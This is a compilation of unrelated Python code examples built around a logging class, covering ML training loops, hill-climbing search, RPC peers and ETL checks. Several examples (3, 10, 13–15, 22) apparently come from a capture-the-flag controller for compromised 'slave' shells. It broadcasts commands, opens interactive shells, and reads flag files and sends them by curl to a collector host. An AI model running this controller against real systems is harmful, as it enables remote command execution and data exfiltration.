Example #1
 def prepare_devices(self):
     try:
         self.scanner_service.set_camera_config()
         self.scanner_service.prepare_cams()
     except Exception:
         print("Unexpected error:", sys.exc_info()[0])
         log = Log()
         log.log_error('Error in the method prepare_devices')
         return {'status': -1}
     return {'status': 1}
Example #2
    def __init__(self, ip='', port=9011, peer_id=-1, build_ui=True, log=None):
        # Node state
        if ip == '':
            self.ip = self._getIP()
        else:
            self.ip = ip
        if not log:
            log = Log('livesession')

        self.id         = peer_id
        self.port       = port
        self.log        = log
        self.name       = '{0}:{1}'.format(self.ip,port)
        self.state      = PeerState(peer_id, self.log)
        self.state.ip   = self.ip
        self.state.port = self.port
        self.state.ips.append(self.state.ip)
        self.state.ports.append(self.state.port)

        # Print start banner
        sep = '-' * (len(str(self.ip)) + len(str(self.port)) + 3)
        self.log.blue('\n\nINIT', self.id)
        self.log.blue(sep)
        self.log.blue(self.ip, ":", self.port)
        self.log.blue(sep)

        # Init main UI
        if build_ui:
            self.window = MainWindow(self.state)
            self.window.show()
            self.window.raise_()
            self.state.window = self.window
            self.state.newStrokesSignal.connect(self.window.scribbleArea.strokesSignalHandler)

        # Handler for the RPC requests
        self.RPCresponder = RPCresponder(self.state)

        # Accept incoming connections in a background thread
        self.server = SimpleXMLRPCServer((ip, port), logRequests=False,
                                         bind_and_activate=False)
        self.server.server_bind()
        self.server.server_activate()
        self.server.register_introspection_functions()
        self.server.register_instance(self.RPCresponder)
        # Name the thread after the resolved address, matching self.name above.
        t = Thread(target=self._run, name='{0}:{1}'.format(self.ip, port))
        t.daemon = True
        t.start()
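
For reference, a peer started this way can be queried with the standard library's XML-RPC client. The sketch below is an illustration under assumptions: it presumes a node listening on localhost:9011 and relies only on the introspection functions registered above.

# Minimal client-side sketch (assumes a node is listening on localhost:9011).
import xmlrpc.client

proxy = xmlrpc.client.ServerProxy('http://localhost:9011')
# system.listMethods is available because register_introspection_functions()
# was called on the server above.
print(proxy.system.listMethods())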
Example #3
 def send_command_log(self, command):
     log_file = "./log/%s.log" % (time.strftime("%Y-%m-%d_%H:%M:%S",
                                                time.localtime()))
     Log.info("Log file : %s" % (log_file))
     self.send_command(command)
     time.sleep(0.5)
     Log.info("Receving data from socket...")
     result = recvall(self.socket_fd)
     Log.success(result)
     with open(log_file, "a+") as f:
         f.write("[%s]\n" % ("-" * 0x20))
         f.write("From : %s:%d\n" % (self.hostname, self.port))
         f.write(u"ISP : %s-%s\n" % (self.country, self.isp))
         f.write(u"Location : %s-%s-%s\n" %
                 (self.area, self.region, self.city))
         f.write("Command : %s\n" % (command))
         f.write("%s\n" % (result))
Example #4
 def _get_submit_token(self):
     html = send_requests(LOGIN_SESSION, self.URLS['getExtraInfo'])
     Log.v("获取token中....")
     result = re.findall(r"var globalRepeatSubmitToken = '(.*)'", html)
     ticket_passenger_info = re.findall(r'var ticketInfoForPassengerForm=(.*);', html)
     if result:
         self.token = result[0]
     if ticket_passenger_info:
         try:
             self.ticket_passenger_info = json.loads(ticket_passenger_info[0].replace("'", "\""))
         # json.loads raises ValueError on malformed data, not just TypeError.
         except (TypeError, ValueError):
             Log.w("Failed to fetch submit info")
             return False
     if self.token and self.ticket_passenger_info:
         Log.v("成功获取token与以及车次信息")
         return True
     else:
         return False
Example #5
def heartbeat_exec_env(exec_env):
    log = Log.get('heartbeat')
    lbl = '<unknown exec-env>'  # Fallback so the except handlers can always log it.
    try:
        id = exec_env.meta.id
        lcp = exec_env.lcp
        lbl = f'{id} (LCP at {exec_env.hostname}:{lcp.port})'
        if exec_env.enabled:
            schema = 'https' if lcp.https else 'http'
            endpoint_lcp = '/' + exec_env.lcp.endpoint if exec_env.lcp.endpoint else ''
            resp = post(
                f'{schema}://{exec_env.hostname}:{lcp.port}{endpoint_lcp}/status',
                timeout=Arg_Reader.db.hb_timeout,
                headers={'Authorization': create_token()},
                json={'id': id})
            if resp.status_code == HTTP_Status.OK:
                data = resp.json()
                id = data.pop('id', None)
                lcp.started = data.get('started', None)
                lcp.last_heartbeat = data.get('last_heartbeat', None)
                log.success(f'Connection established with exec-env {lbl}')
            else:
                lcp.last_heartbeat = None
                log.warning(f'Connection reset with exec-env {lbl}')
                log.notice(f'Response: {resp.content}')
            lcp.https = bool(lcp.https)  # Normalize an unset value to False.
            exec_env.save()
        else:
            log.notice(f'Exec-env {lbl} not enabled')
    except ConnectTimeout:
        log.error(f'Connection timeout with exec-env {lbl}')
    except ConnectionError:
        log.error(f'Connection refused with exec-env {lbl}')
    except Exception as exception:
        log.exception(f'Exception during connection with exec-env {lbl}',
                      exception)
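
For reference, the names used above map onto the requests library plus a few project helpers. A plausible import block is sketched below; the project-local module paths are assumptions, not confirmed locations.

# Sketch of the imports this snippet relies on. The requests imports are
# real; the project-local paths (utils.log, lib.http, reader.arg) are guesses.
from requests import post
from requests.exceptions import ConnectionError, ConnectTimeout

from utils.log import Log          # assumed: Log.get(), .success(), .warning(), ...
from lib.http import HTTP_Status   # assumed: HTTP_Status.OK == 200
from reader.arg import Arg_Reader  # assumed: Arg_Reader.db.hb_timeout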
Example #6
 def _validate_jobs(self):
     Log.Instance().appendFinalReport('\nValidating kpis/jobs...\n')
     for job, job_def in self.loaded_jobs.items():
         if job_def.action == 'insert' and job_def.table_name is None:
             SystemExiter.Instance().exit(
                 'Error: ' + job + ' needs table name to insert data')
     if len(Config.JOBS_NAMES) == 0:
         all_final_jobs = [
             job_name for job_name in list(self.loaded_jobs.keys())
             if self.loaded_jobs[job_name].is_kpi()
         ]
         if Config.RUN_JOBS:
              Config.JOBS_NAMES += all_final_jobs
     for job_name in Config.JOBS_NAMES:
         if job_name not in self.loaded_jobs:
             SystemExiter.Instance().exit(
                 'Error: ' + job_name + ' not found in jobs definitions')
Example #7
 def _add_date_field(self, collection):
     results = []
     count_errors = 0
     for item in collection:
         if 'created_at' in item:
             date = item['created_at']
             item['created_at'] = date.strftime("%Y-%m-%d")
         else:
             try:
                 item_date = datetime(int(item['year']), int(item['month']),
                                      int(item['day']))
                 item['created_at'] = item_date.strftime("%Y-%m-%d")
             except KeyError:
                 item['created_at'] = "temp"
             except (TypeError, ValueError):
                 count_errors += 1
                 continue
         results.append(item)
     Log.Instance().appendFinalReport(
         "Error parsing created_at field. Count: %s" % (count_errors))
     return results
Example #8
    def update(self) -> None:
        update = self._config.update()
        if update:
            if 'prooftrace_search_learning_rate' in update:
                lr = self._config.get('prooftrace_search_learning_rate')
                if lr != self._learning_rate:
                    self._learning_rate = lr
                    for group in self._policy_optimizer.param_groups:
                        group['lr'] = lr
                    for group in self._value_optimizer.param_groups:
                        group['lr'] = lr
                    Log.out("Updated", {
                        "prooftrace_search_learning_rate": lr,
                    })
            if 'prooftrace_search_iota_min_update_count' in update:
                cnt = \
                    self._config.get('prooftrace_search_iota_min_update_count')
                if cnt != self._min_update_count:
                    self._min_update_count = cnt
                    Log.out("Updated", {
                        "prooftrace_search_iota_min_update_count": cnt,
                    })
            if 'prooftrace_search_model_type' in update:
                model_type = self._config.get('prooftrace_search_model_type')
                if model_type != self._type:
                    self._type = model_type
                    Log.out("Updated", {
                        "prooftrace_search_model_type": model_type,
                    })

            if self._tb_writer is not None:
                for k in update:
                    if k in [
                            'prooftrace_search_learning_rate',
                            'prooftrace_search_iota_min_update_count',
                            'prooftrace_search_action_coeff',
                    ]:
                        self._tb_writer.add_scalar(
                            "prooftrace_search_train_run/{}".format(k),
                            update[k],
                            self._epoch,
                        )
Example #9
    def delegate(self, args, **kwargs):
        """
        Executes the command based on the given cli args.

        Parameters
        ----------
        args: Namespace
            The argparse cli arguments
        kwargs: dict
            The arguments to be passed to the handler
        """

        Log.raw_info(self.BANNER)

        Log.info("Checking wine installation")
        if not self.__which("wine"):
            raise ValueError("Unable to continue: wine NOT FOUND")

        Log.info("wine status: OK")
        self.handler(args, kwargs)
Example #10
def transfer(h):
    slave = slaves[h]
    socket_fd = slave.socket_fd
    buffer_size = 0x400
    interactive_stat = True
    while True:
        if EXIT_FLAG:
            Log.warning("Transfer function exiting...")
            break
        interactive_stat = slave.interactive
        buffer = socket_fd.recv(buffer_size)
        if not buffer:
            Log.error("No data, breaking...")
            break
        sys.stdout.write(buffer)
        if not interactive_stat:
            break
    if interactive_stat:
        Log.error("Unexpected EOF!")
        socket_fd.shutdown(socket.SHUT_RDWR)
        socket_fd.close()
        slave.remove_node()
Example #11
    def test_log(self):

        import re

        #VARIABLES
        log_path = 'c:/temp/utils_log_unittest.log'
        header = 'datetime,host,user,text'
        entry = 'this is a test'
        pattern_entry = r'([0-9]{4}-[0-9]{2}-[0-9]{2}\s[0-9]{2}:[0-9]{2}:[0-9]{2}\.[0-9]{6},' \
                        r'[0-9a-zA-Z].*,' \
                        r'[0-9a-zA-Z].*,' + entry + ')'
        exp = re.compile(pattern_entry)

        #INSTANTIATE LOG CLASS
        _log = Log(filepath=log_path,
                   autofill=True,
                   printheader=True,
                   headertext=header)

        #WRITE LOG FILE
        _log.write(text=entry)
        _log.write_blank_line()

        #READ IN LOG FILE
        with open(log_path, 'r') as f:
            text = [line.strip() for line in f.readlines()]

        #TEST HEADER
        self.assertTrue(text[0] == header)

        #TEST LOG ENTRY AGAINST REGEX
        self.assertTrue(len(exp.findall(text[1])) == 1)

        #TEST FOR BLANK LINE (WRITTEN BY write_blank_line() METHOD)
        self.assertTrue(text[2] == '')

        #DELETE THE LOG FILE
        if os.path.exists(log_path): os.remove(log_path)
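
The test drives a Log class through filepath/autofill/printheader/headertext arguments and the write()/write_blank_line() methods. A minimal stand-in consistent with that interface (an assumption for illustration, not the library's actual implementation) could look like:

import getpass
import os
import socket
from datetime import datetime


class Log:
    """Minimal stand-in for the logger under test (assumed interface)."""

    def __init__(self, filepath, autofill=False, printheader=False,
                 headertext=''):
        self._filepath = filepath
        self._autofill = autofill
        if printheader and not os.path.exists(filepath):
            with open(filepath, 'a') as f:
                f.write(headertext + '\n')

    def write(self, text):
        prefix = ''
        if self._autofill:
            # datetime,host,user, -- mirrors the header layout in the test.
            prefix = '%s,%s,%s,' % (datetime.now(), socket.gethostname(),
                                    getpass.getuser())
        with open(self._filepath, 'a') as f:
            f.write(prefix + text + '\n')

    def write_blank_line(self):
        with open(self._filepath, 'a') as f:
            f.write('\n')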
Example #12
# -*- coding:utf-8 -*-
# __author__ = 'pan'

import os, time
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from utils.log import Log
from utils.readyaml import ReadYaml

# Test report path
reportPath = os.path.dirname(os.path.dirname(__file__)) + '/report/'
logger = Log()


class SendMail:
    '''Send mail with attachments.'''
    def __init__(self, mail_config_file):
        config = ReadYaml(mail_config_file).getValue()
        self.sendTo = config['to_address']
        self.sender_name = config['sender_name']
        self.sender_pswd = config['sender_pswd']
        self.host = config['host']
        self.subject = config['subject']

    def __get_report(self):
        '''Get the latest test report.'''
        # List all files in the report directory
        lists = os.listdir(reportPath)
        lists.sort()
        new_report_name = lists[-1]
Example #13
def main():
    global EXIT_FLAG  # Assigned below on quit; must target the module-level flag.
    if len(sys.argv) != 3:
        print "Usage : "
        print "\tpython master.py [HOST] [PORT]"
        exit(1)

    host = sys.argv[1]
    port = int(sys.argv[2])
    EXEC_LOCAL = True

    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)

    Log.info("Starting server...")
    master_thread = threading.Thread(target=master, args=(
        host,
        port,
    ))
    Log.info("Connecting to localhost server...")
    slaver_thread = threading.Thread(target=slaver, args=(
        host,
        port,
        True,
    ))
    master_thread.daemon = True
    slaver_thread.daemon = True
    master_thread.start()
    slaver_thread.start()
    time.sleep(1)
    show_commands()
    position = slaves[slaves.keys()[0]].node_hash  # master himself
    while True:
        if len(slaves.keys()) == 0:
            Log.error("No slaves left , exiting...")
            break
        if not position in slaves.keys():
            Log.error("Node is offline... Changing node...")
            position = slaves.keys()[0]
        current_slave = slaves[position]
        context_hint = "[%s:%d] >> " % (current_slave.hostname,
                                        current_slave.port)
        Log.context(context_hint)
        command = raw_input() or "h"
        if command.startswith("#"):
            continue
        if command == "h" or command == "help" or command == "?" or command == "\n":
            show_commands()
        elif command == "l":
            Log.info("Listing online slaves...")
            for key in slaves.keys():
                print "[%s]" % ("-" * 0x2A)
                slaves[key].show_info()
            print "[%s]" % ("-" * 0x2A)
        elif command == "p":
            current_slave.show_info()
        elif command == "c":
            command = raw_input("Input command (uname -r) : ") or ("uname -r")
            Log.info("Command : %s" % (command))
            for i in slaves.keys():
                slave = slaves[i]
                result = slave.send_command_print(command)
        elif command == "g":
            input_node_hash = raw_input(
                "Please input target node hash : ") or position
            Log.info("Input node hash : %s" % (repr(input_node_hash)))
            if input_node_hash == position:
                Log.warning("Position will not change!")
                continue
            found = False
            for key in slaves.keys():
                if key.startswith(input_node_hash):
                    # old_slave = slaves[position]
                    new_slave = slaves[key]
                    # Log.info("Changing position from [%s:%d] to [%s:%d]" % (old_slave.hostname, old_slave.port, new_slave.hostname, new_slave.port))
                    Log.info("Changing position to [%s:%d]" %
                             (new_slave.hostname, new_slave.port))
                    position = key
                    found = True
                    break
            if not found:
                Log.error("Please check your input node hash!")
                Log.error("Position is not changed!")
        elif command == "setl":
            EXEC_LOCAL = True
        elif command == "setr":
            EXEC_LOCAL = False
        elif command == "f*g":
            flag_path = raw_input("Input flag path (/flag.txt) : ") or (
                "/flag.txt")
            box_host = raw_input("Input flag box host (192.168.187.128) : "
                                 ) or ("192.168.187.128")
            box_port = int(raw_input("Input flag box host (80) : ") or ("80"))
            for i in slaves.keys():
                slave = slaves[i]
                command = "FLAG=`cat %s | base64`" % (flag_path)
                Log.info("Command : %s" % (command))
                result = slave.send_command(command)
                command = "curl \"http://%s:%d/?flag=${FLAG}\"" % (box_host,
                                                                   box_port)
                Log.info("Command : %s" % (command))
                result = slave.send_command(command)
                if result:
                    Log.info("Flag is sent to you!")
                else:
                    # slave.remove_node()
                    Log.error(
                        "Executing command failed! Connection aborted! Node removed!"
                    )
                    position = slaves.keys()[0]
                    Log.info("Position changed to : %s" % (position))
        elif command == "fg":
            flag_path = raw_input("Input flag path (/flag.txt) : ") or (
                "/flag.txt")
            box_host = raw_input("Input flag box host (192.168.187.128) : "
                                 ) or ("192.168.187.128")
            box_port = int(raw_input("Input flag box host (80) : ") or ("80"))
            command = "FLAG=`cat %s | base64`" % (flag_path)
            Log.info("Command : %s" % (command))
            result = current_slave.send_command(command)
            command = "curl \"http://%s:%d/?flag=${FLAG}\"" % (box_host,
                                                               box_port)
            Log.info("Command : %s" % (command))
            result = current_slave.send_command(command)
            if result:
                Log.info("Flag is sent to you!")
            else:
                # slave.remove_node()
                Log.error(
                    "Executing command failed! Connection aborted! Node removed!"
                )
                position = slaves.keys()[0]
                Log.info("Position changed to : %s" % (position))
        elif command == "i":
            current_slave.interactive_shell()
        elif command == "q" or command == "quit" or command == "exit":
            EXIT_FLAG = True
            # TODO : release all resources before closing
            Log.info("Releasing resources...")
            for key in slaves.keys():
                slave = slaves[key]
                Log.error("Closing conntion of %s:%d" %
                          (slave.hostname, slave.port))
                slave.socket_fd.shutdown(socket.SHUT_RDWR)
                slave.socket_fd.close()
            Log.error("Exiting...")
            exit(0)
        else:
            Log.error("Unsupported command!")
            if EXEC_LOCAL:
                os.system(command)
            else:
                current_slave.send_command_print(command)
Example #14
 def remove_node(self):
     Log.error("Removing Node!")
     if self.node_hash in slaves.keys():
         slaves.pop(self.node_hash)
Example #15
 def send_command_print(self, command):
     self.send_command(command)
     time.sleep(0.125)
     result = recvall(self.socket_fd)
     Log.success(result)
Example #16
def steepest_hill_climbing_tabou(problem,
                                 depart,
                                 args=(math.inf, math.inf),
                                 log=None):
    (max_depl, k) = args

    if log is None:
        log = Log()
    log.write("START Tabou Hill Climbing", 2)
    log.write("MAX_DEPL = %s" % str(max_depl), 3)
    log.write("K = %s" % str(k), 3)
    log.write(problem, 3)

    best = depart
    s = depart
    tmp = None
    tabou = Tabou(k)
    nb_depl = 0
    optimum_found = False
    while not optimum_found and nb_depl < max_depl:
        log.write("step %d :\t %s" % (nb_depl, s.tostr()), 5)
        voisins_non_tabous = [
            x for x in s.get_voisins()
            if x.acceptable() and x.vec not in [y.vec for y in tabou.list]
        ]
        log.write(
            "%d non-tabu neighbours (tabu list size %d)" %
            (len(voisins_non_tabous), len(tabou.list)), 6)
        if len(voisins_non_tabous) > 0:
            tmp = problem.meilleur_of_sols(voisins_non_tabous)
        else:
            optimum_found = True

        tabou.push_obj(s)

        # tmp is still None if the very first step finds no admissible
        # neighbour; guard against that before comparing.
        if tmp is not None:
            if tmp.meilleur_que(best):
                best = tmp
                log.write("New local optimum : %s" % best.tostr(), 4)
            s = tmp
        nb_depl += 1

    log.write("END Tabou Hill Climbing", 2)
    log.write("Tabou : %s" % str(tabou), 3)
    log.write("Depart : %s" % depart.tostr(), 3)
    log.write("Optimum local : %s" % best.tostr(), 3)
    log.write("%d déplacements effectués" % nb_depl, 3)

    return (depart, nb_depl, best, tabou)
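
The Tabou class itself is not shown. Given how it is used above (Tabou(k), push_obj(), a list attribute, str()), a minimal fixed-size tabu list could be sketched as follows; this is a guess at the interface, not the original implementation.

import math
from collections import deque


class Tabou:
    """Minimal sketch of a tabu list keeping the last k pushed solutions."""

    def __init__(self, k):
        # k may be math.inf (unbounded); deque(maxlen=None) handles that case.
        self._items = deque(maxlen=None if k == math.inf else int(k))

    def push_obj(self, obj):
        self._items.append(obj)

    @property
    def list(self):
        return list(self._items)

    def __str__(self):
        return '[%s]' % ', '.join(x.tostr() for x in self._items)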
Example #17
def steepest_hill_climbing(problem, depart, args=(math.inf,), log=None):
    # Note the trailing commas: (math.inf) without one is just a float,
    # not a one-element tuple.
    (max_depl,) = args

    if log is None:
        log = Log()
    log.write("START Steepest Hill Climbing", 2)
    log.write("MAX_DEPL = %s" % str(max_depl), 3)
    log.write(problem, 3)

    s = depart
    nb_depl = 0
    optimum_found = False
    while nb_depl < max_depl and not optimum_found:
        meilleur_voisin = problem.meilleur_voisin_of_sol(s)
        if meilleur_voisin is not None and meilleur_voisin.meilleur_que(s):
            log.write("step %d :\t %s" % (nb_depl, s.tostr()), 5)
            nb_depl += 1
            s = meilleur_voisin
        else:
            optimum_found = True
    log.write("END Steepest Hill Climbing", 2)
    log.write("Depart : %s" % depart.tostr(), 3)
    log.write("Optimum local : %s" % s.tostr(), 3)
    log.write("Trouvé en %d déplacements" % nb_depl, 3)
    return (depart, nb_depl, s)
Example #18
def steepest_hill_climbing_redemarrage(problem,
                                       methode,
                                       args,
                                       nb_essais=1,
                                       log=None):
    if log is None:
        log = Log()

    log.write("START Redémarrage", 0)
    log.write(problem, 1)
    log.write("%s essais" % str(nb_essais), 1)
    log.write("Methode : %s\n" % str(methode), 1)

    possible_starts = problem.get_random_solutions(nb_essais)
    best = []
    for solution in possible_starts:
        tmp = methode(problem, solution, args, log)
        if best == [] or tmp[2].meilleur_que(best[2]):
            best = tmp
            log.write("Nouvel optimum local : %s" % best[2].tostr(), 1)

    log.write("END Redémarrage", 0)
    log.write("Depart : %s" % best[0].tostr(), 0)
    log.write("Optimum local : %s" % best[2].tostr(), 0)
    log.write("Trouvé en %d déplacements" % best[1], 0)

    return best
Example #19
    def __init__(
        self,
        config: Config,
    ):
        self._config = config

        self._learning_rate = config.get('prooftrace_lm_learning_rate')
        self._min_update_count = \
            config.get('prooftrace_lm_iota_min_update_count')
        self._device = torch.device(config.get('device'))

        self._save_dir = config.get('prooftrace_save_dir')
        self._load_dir = config.get('prooftrace_load_dir')

        self._epoch = 0

        self._tb_writer = None
        if self._config.get('tensorboard_log_dir'):
            self._tb_writer = SummaryWriter(
                self._config.get('tensorboard_log_dir'))

        self._modules = {
            'E': E(self._config).to(self._device),
            'T': T(self._config).to(self._device),
            'PH': PH(self._config).to(self._device),
            'VH': VH(self._config).to(self._device),
        }

        Log.out(
            "SYN Initializing",
            {
                'parameter_count_E': self._modules['E'].parameters_count(),
                'parameter_count_T': self._modules['T'].parameters_count(),
                'parameter_count_PH': self._modules['PH'].parameters_count(),
                'parameter_count_VH': self._modules['VH'].parameters_count(),
            },
        )

        self._syn = IOTASyn(
            config.get('prooftrace_lm_iota_sync_dir'),
            self._modules,
        )

        self._optimizer = optim.Adam(
            [
                {'params': self._modules['E'].parameters()},
                {'params': self._modules['T'].parameters()},
                {'params': self._modules['PH'].parameters()},
                {'params': self._modules['VH'].parameters()},
            ],
            lr=self._learning_rate,
        )

        self._syn.broadcast({'config': self._config})
Example #20
    def run_once(
        self,
        epoch,
    ):
        for it, (act, arg, trh) in enumerate(self._train_loader):
            info = self._ack.fetch(self._device)
            if info is not None:
                self.update(info['config'])
            self._model.train()

            trh_actions, trh_lefts, trh_rights = trh_extract(trh, arg)

            # Because we can't run a pointer network on the full length
            # (memory), we extract indices to focus loss on.
            idx = random.sample(range(self._sequence_length), 64)

            actions = torch.index_select(
                torch.tensor(trh_actions, dtype=torch.int64),
                1,
                torch.tensor(idx, dtype=torch.int64),
            ).to(self._device)
            lefts = torch.index_select(
                torch.tensor(trh_lefts, dtype=torch.int64),
                1,
                torch.tensor(idx, dtype=torch.int64),
            ).to(self._device)
            rights = torch.index_select(
                torch.tensor(trh_rights, dtype=torch.int64),
                1,
                torch.tensor(idx, dtype=torch.int64),
            ).to(self._device)

            prd_actions, prd_lefts, prd_rights = \
                self._model.infer(idx, act, arg)

            act_loss = self._nll_loss(
                prd_actions.view(-1, prd_actions.size(-1)),
                actions.view(-1),
            )
            lft_loss = self._nll_loss(
                prd_lefts.view(-1, prd_lefts.size(-1)),
                lefts.view(-1),
            )
            rgt_loss = self._nll_loss(
                prd_rights.view(-1, prd_rights.size(-1)),
                rights.view(-1),
            )

            # Backward pass.
            for m in self._model.modules():
                self._model.modules()[m].zero_grad()

            (self._action_coeff * act_loss + lft_loss + rgt_loss).backward()

            if self._grad_norm_max > 0.0:
                for m in self._model.modules():
                    torch.nn.utils.clip_grad_norm_(
                        self._model.modules()[m].parameters(),
                        self._grad_norm_max,
                    )

            info = {
                'act_loss': act_loss.item(),
                'lft_loss': lft_loss.item(),
                'rgt_loss': rgt_loss.item(),
            }

            self._ack.push(info, None)
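            # Note: there is deliberately no optimizer.step() in this worker.
            # Gradients are shipped through self._ack.push and applied by the
            # SYN process, whose run_once (shown in later examples) calls
            # self._syn.reduce(...) followed by optimizer.step().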

            Log.out(
                "PROOFTRACE LM ACK RUN", {
                    'epoch': epoch,
                    'train_batch': self._train_batch,
                    'act_loss_avg': "{:.4f}".format(act_loss.item()),
                    'lft_loss_avg': "{:.4f}".format(lft_loss.item()),
                    'rgt_loss_avg': "{:.4f}".format(rgt_loss.item()),
                })

            self._train_batch += 1

        Log.out("EPOCH DONE", {
            'epoch': epoch,
        })
Example #21
    def run_once(
        self,
        epoch,
    ):
        act_loss_meter = Meter()
        lft_loss_meter = Meter()
        rgt_loss_meter = Meter()

        with torch.no_grad():
            for it, (act, arg, trh) in enumerate(self._test_loader):
                self._ack.fetch(self._device, blocking=False)
                self._model.eval()

                trh_actions, trh_lefts, trh_rights = trh_extract(trh, arg)

                # Because we can't run a pointer network on the full length
                # (memory), we extract indices to focus loss on.
                idx = random.sample(range(self._sequence_length), 64)

                actions = torch.index_select(
                    torch.tensor(trh_actions, dtype=torch.int64),
                    1,
                    torch.tensor(idx, dtype=torch.int64),
                ).to(self._device)
                lefts = torch.index_select(
                    torch.tensor(trh_lefts, dtype=torch.int64),
                    1,
                    torch.tensor(idx, dtype=torch.int64),
                ).to(self._device)
                rights = torch.index_select(
                    torch.tensor(trh_rights, dtype=torch.int64),
                    1,
                    torch.tensor(idx, dtype=torch.int64),
                ).to(self._device)

                prd_actions, prd_lefts, prd_rights = \
                    self._model.infer(idx, act, arg)

                act_loss = self._nll_loss(
                    prd_actions.view(-1, prd_actions.size(-1)),
                    actions.view(-1),
                )
                lft_loss = self._nll_loss(
                    prd_lefts.view(-1, prd_lefts.size(-1)),
                    lefts.view(-1),
                )
                rgt_loss = self._nll_loss(
                    prd_rights.view(-1, prd_rights.size(-1)),
                    rights.view(-1),
                )

                act_loss_meter.update(act_loss.item())
                lft_loss_meter.update(lft_loss.item())
                rgt_loss_meter.update(rgt_loss.item())

                info = {
                    'test_act_loss': act_loss_meter.avg,
                    'test_lft_loss': lft_loss_meter.avg,
                    'test_rgt_loss': rgt_loss_meter.avg,
                }

                self._ack.push(info, None, True)

                Log.out(
                    "PROOFTRACE LM TST RUN", {
                        'epoch': epoch,
                        'act_loss_avg': "{:.4f}".format(act_loss.item()),
                        'lft_loss_avg': "{:.4f}".format(lft_loss.item()),
                        'rgt_loss_avg': "{:.4f}".format(rgt_loss.item()),
                    })

                self._train_batch += 1

        Log.out("EPOCH DONE", {
            'epoch': epoch,
        })
Example #22
 def show_info(self):
     Log.info("Hash : %s" % (self.node_hash))
     Log.info("IP : %s" % (self.hostname))
     Log.info("Port : %s" % (self.port))
Example #23
    def run_once(
        self,
        epoch,
    ):
        for m in self._modules:
            self._modules[m].train()

        for it, (idx, act, arg, trh, val) in enumerate(self._train_loader):
            info = self._ack.fetch(self._device)
            if info is not None:
                self.update(info['config'])

            action_embeds = self._modules['E'](act)
            argument_embeds = self._modules['E'](arg)

            hiddens = self._modules['T'](action_embeds, argument_embeds)
            heads = torch.cat(
                [hiddens[i][idx[i]].unsqueeze(0) for i in range(len(idx))],
                dim=0)
            targets = torch.cat(
                [action_embeds[i][0].unsqueeze(0) for i in range(len(idx))],
                dim=0)

            prd_actions, prd_lefts, prd_rights = \
                self._modules['PH'](heads, hiddens, targets)
            prd_values = self._modules['VH'](heads, targets)

            actions = torch.tensor(
                [trh[i].value - len(PREPARE_TOKENS) for i in range(len(trh))],
                dtype=torch.int64).to(self._device)
            lefts = torch.tensor(
                [arg[i].index(trh[i].left) for i in range(len(trh))],
                dtype=torch.int64).to(self._device)
            rights = torch.tensor(
                [arg[i].index(trh[i].right) for i in range(len(trh))],
                dtype=torch.int64).to(self._device)
            values = torch.tensor(val).unsqueeze(1).to(self._device)

            act_loss = self._nll_loss(prd_actions, actions)
            lft_loss = self._nll_loss(prd_lefts, lefts)
            rgt_loss = self._nll_loss(prd_rights, rights)
            val_loss = self._mse_loss(prd_values, values)

            # Backward pass.
            for m in self._modules:
                self._modules[m].zero_grad()

            (self._action_coeff * act_loss + lft_loss + rgt_loss +
             self._value_coeff * val_loss).backward()

            self._ack.push(
                {
                    'act_loss': act_loss.item(),
                    'lft_loss': lft_loss.item(),
                    'rgt_loss': rgt_loss.item(),
                    'val_loss': val_loss.item(),
                }, None)

            Log.out(
                "PROOFTRACE LM ACK RUN", {
                    'epoch': epoch,
                    'train_batch': self._train_batch,
                    'act_loss_avg': "{:.4f}".format(act_loss.item()),
                    'lft_loss_avg': "{:.4f}".format(lft_loss.item()),
                    'rgt_loss_avg': "{:.4f}".format(rgt_loss.item()),
                    'val_loss_avg': "{:.4f}".format(val_loss.item()),
                })

            self._train_batch += 1

        Log.out("EPOCH DONE", {
            'epoch': epoch,
        })
Example #24
    def run_once(self):
        for m in self._modules:
            self._modules[m].train()

        run_start = time.time()

        self._optimizer.zero_grad()
        infos = self._syn.reduce(self._device, self._min_update_count)

        if len(infos) == 0:
            time.sleep(1)
            return

        self._optimizer.step()
        self._syn.broadcast({'config': self._config})

        act_loss_meter = Meter()
        lft_loss_meter = Meter()
        rgt_loss_meter = Meter()
        val_loss_meter = Meter()

        for info in infos:
            act_loss_meter.update(info['act_loss'])
            lft_loss_meter.update(info['lft_loss'])
            rgt_loss_meter.update(info['rgt_loss'])
            val_loss_meter.update(info['val_loss'])

        Log.out(
            "PROOFTRACE LM SYN RUN", {
                'epoch': self._epoch,
                'run_time': "{:.2f}".format(time.time() - run_start),
                'update_count': len(infos),
                'act_loss': "{:.4f}".format(act_loss_meter.avg or 0.0),
                'lft_loss': "{:.4f}".format(lft_loss_meter.avg or 0.0),
                'rgt_loss': "{:.4f}".format(rgt_loss_meter.avg or 0.0),
                'val_loss': "{:.4f}".format(val_loss_meter.avg or 0.0),
            })

        if self._tb_writer is not None:
            if act_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/act_loss",
                    act_loss_meter.avg,
                    self._epoch,
                )
            if lft_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/lft_loss",
                    lft_loss_meter.avg,
                    self._epoch,
                )
            if rgt_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/rgt_loss",
                    rgt_loss_meter.avg,
                    self._epoch,
                )
            if val_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/val_loss",
                    val_loss_meter.avg,
                    self._epoch,
                )
            self._tb_writer.add_scalar(
                "prooftrace_lm_train/update_count",
                len(infos),
                self._epoch,
            )

        self._epoch += 1

        if self._epoch % 100 == 0:
            self.save()
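
Meter is used above only through update(x) and an avg attribute that may be None before the first update. A minimal running-average sketch matching that contract (an assumption, not the original class) would be:

class Meter:
    """Running-average meter (minimal sketch of the assumed interface)."""

    def __init__(self):
        # avg stays None until the first update, as the
        # `meter.avg is not None` checks above expect.
        self.avg = None
        self._sum = 0.0
        self._count = 0

    def update(self, value):
        self._sum += value
        self._count += 1
        self.avg = self._sum / self._count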
Example #25
def test():
    parser = argparse.ArgumentParser(description="")

    parser.add_argument(
        'config_path',
        type=str, help="path to the config file",
    )
    parser.add_argument(
        '--dataset_size',
        type=str, help="config override",
    )

    args = parser.parse_args()

    config = Config.from_file(args.config_path)

    if args.dataset_size is not None:
        config.override(
            'prooftrace_dataset_size',
            args.dataset_size,
        )

    with gzip.open(
            os.path.join(
                os.path.expanduser(config.get('prooftrace_dataset_dir')),
                config.get('prooftrace_dataset_size'),
                'traces.tokenizer',
